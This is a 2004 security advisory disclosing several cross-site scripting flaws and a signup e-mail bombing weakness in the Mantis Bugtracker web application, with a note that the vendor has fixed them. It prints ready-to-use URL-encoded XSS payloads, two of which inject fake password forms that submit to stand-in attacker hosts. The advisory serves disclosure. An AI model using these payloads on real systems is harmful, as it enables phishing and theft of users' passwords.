--------------------------------------------------------------------------- Multiple vulnerabilities in Mantis Bugtracker --------------------------------------------------------------------------- Author: Joxean Koret Date: This year, 2004 :) between June and August Location: Basque Country --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mantis Bugtracker Mantis is a web-based bugtracking system. It is written in the PHP scripting language and requires the MySQL database and a webserver. --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~ A. Multiple Cross Site Scripting Vulnerabilities : A1. The first vulnerability that I found is this : You can login in anonymously and, when do you want to perform a privileged action you need to re-login with any valid user. The previous URL is passed as the return parameter to the login_page.php script. This parameter is not correctly sanitized when showing/parsing and we can put any html/script code that we want. To try the first vulnerability copy the following text and paste in the location bar of your favourite web browser : http:///login_page.php?return=% 22%3E%3Ch1%3EHello!%3C/h1%3E% 3Cform%20action=% 22http://malicious.site.com/script.xxx%22% 3EPlease%20type%20your%20password%20: %20%3Cinput%20type=%22password%22% 20name=%22your_password%22%3E%3Cbr% 3E%3Cinput%20type=%22submit%22% 20value=%22Give%20me%20your% 20password,%20please...%22%3E%3C/form% 3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr% 3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr% 3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr% 3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr% 3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr% 3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr% 3E%3Cbr A2. Register New User Xss Vulnerability -The second XSS problem is in the script signup.php (for example, http://bugs.mantisbt.org/signup.php). [^] This scripts registers a new user. The problem is that the script's doesn't sanitize properly the passed e-mail when showing/parsing. Now, we have the second XSS problem that I found. To test it, please follow these steps : - Navigate to http:///signup_page.php [^] - In the username field type any username that you want - In the e-mail field type this text : or

Hi!

A3. Select Project XSS Vulnerability ------------------------------------ -I will no explicate the problem because is the same all times. Try the following URL please : http:///login_select_proj_page.php?ref=% 3Cbr%3E%3Cform%20action=% 22http://my.fucking.site/xxx.sss%22%3E% 3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:% 3C/td%3E%3Ctd%3E%3Cinput%20type=text% 20name=user%3E%3C/tr%3E%3Ctr%3E% 3Ctd%3EPassword:%3C/td%3E%3Ctd%3E% 3Cinput%20type=password%20name=pass% 3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd% 20colspan=2%3E%3Cinput%20type=submit% 20%20value=%22login%22%20onclick=% 22javascript:alert('hi')%22%3E%3C/td%3E% 3C/tr%3E%3C/form%3E A4. An other XSS Vulnerability - Try the following URL : http:///view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script> ---------------------------------------------- B. Possible E-Mail Bomber. - That's fun! We can create a simple program to send too many e-mails to the same e-mail address by simply changing the username. For example : 1.-Navigate to http:///signup_page.php 2.- In the username field type test0 3.- In the e-mail type test@test.com 4.- Send it. 1.-Navigate to http:///signup_page.php 2.- In the username field type test1 3.- In the e-mail type test@test.com 4.- Send it. If do you want to try the problem you can use the following simple script : ====================================================================== mantis-email-bomber.php ====================================================================== --------------------------------------------------------------------------- The fix: ~~~~~~~~ Vendor is contacted and all the bugs are correcteds in the CVS version at sourceforge.net site. --------------------------------------------------------------------------- Contact: ~~~~~~~~ Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<>>>>es